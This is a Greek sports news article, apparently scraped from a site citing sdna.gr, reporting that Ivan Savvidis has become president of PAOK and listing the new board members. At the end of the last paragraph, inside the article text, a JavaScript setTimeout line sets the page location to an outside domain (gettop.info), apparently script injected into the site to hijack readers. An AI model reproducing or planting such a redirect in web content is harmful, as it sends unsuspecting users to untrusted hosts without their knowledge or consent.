Επίσημα πρόεδρος του ΠΑΟΚ ο Σαββίδης

0
6
ΠΑΡΟΥΣΙΑΣΗ ΤΟΥ ΝΕΟΥ ΠΡΟΠΟΝΗΤΗ ΤΟΥ ΠΑΟΚ ΧΙΟΥΜΠ ΣΤΕΦΕΝΣ ΑΠΟ ΤΟΝ ΙΒΑΝ ΣΑΒΒΙΔΗ

 

Ολοκληρώθηκε η Γενική Συνέλευση του ΠΑΟΚ με τον Ιβάν Σαββίδη να αναλαμβάνει πρόεδρος του δικεφάλου και τον γιο του Γιώργο να αναλαμβάνει θέση στην ΠΑΕ.

Όπως αναφέρει το sdna.gr, παρόντες στη Γενική συνέλευση στην Τούμπα είναι οι: Γκαγκάτσης, Γεροντιδης, Γκοντσαρεβα, Κούδας, Μαυρομάτης καθώς και ορισμένοι μικρομέτοχοι της ΠΑΕ. Ο Ιβάν Σαββίδης που αναλαμβάνει πρόεδρος δεν έχει δώσει ακόμα το «παρόν» αλλά ίσως πάει αργότερα στην Τούμπα και στο Διοικητικό Συμβούλιο που θα γίνει.

Στο οκταμελές σχήμα είναι και ο Γιώργος Σαββίδης χωρίς για την ωρα να έχει γίνει γνωστή η θέση που θα κατέχει.

Το νέο Δ.Σ. αποτελείται απο τους Ιβάν Σαββίδη, Γιώργο Σαββιδη, Αρτουρ Νταβιντιαν, Μάκης Γκαγκάτση, Ηλία Γεροντίδη, Λούμπος Μίχελ, Δημοκράτη Παπαδοπουλο και η Μαρία Γκοντσάρεβα. Πρόεδρος της ΓΣ ήταν ο Γκαγκάτσης και γραμματέας ο Νομικός σύμβουλος της ΠΑΕ Αχιλλέας Μαυρομάτης.

Ακολούθως θα γίνει το πρώτο Δ.Σ. της ΠΑΕ με το διευρυνόμενο συμβούλιο και το πρώτο με τον Ιβάν Σαββίδη στη θέση του προέδρου και κύριο θέμα θα είναι ο καταμερισμός θέσεων στα μέλη του συμβουλίου, σύμφωνα με το sdna.gr. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here